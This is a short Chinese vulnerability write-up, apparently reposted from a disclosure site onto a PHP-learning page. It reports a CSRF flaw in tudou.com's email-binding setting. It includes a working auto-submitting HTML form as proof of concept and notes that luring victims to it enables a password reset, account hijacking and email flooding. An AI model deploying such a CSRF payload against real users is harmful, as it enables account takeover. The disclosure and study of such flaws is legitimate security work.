来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 这是问题页面~顺带一个比较糟糕的问题,这里没有设置邮件发送间隔的时间哦,相当于发动技能无cd。看吧刷屏了,可以做炸弹神马的哦。言归正传,先抓个包木有token哦客官。pochtmlb...
这是问题页面~
言归正传,先抓个包
poc
<html> <body> <form id="tudou" name="tudou" action="http://www.tudou.com/my/setting/private.action" method="POST"> <input type="hidden" name="email" value="***@163.com" /> <input type="submit" value="submit" /> </form> <script> document.tudou.submit(); </script> </body> </html>
然后就上传页面到服务器,诱惑用户访问,pia一声就会有验证邮件了哦。 更糟糕的是绑定后就可以重置密码了,然后就是劫持账户,然后…… |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com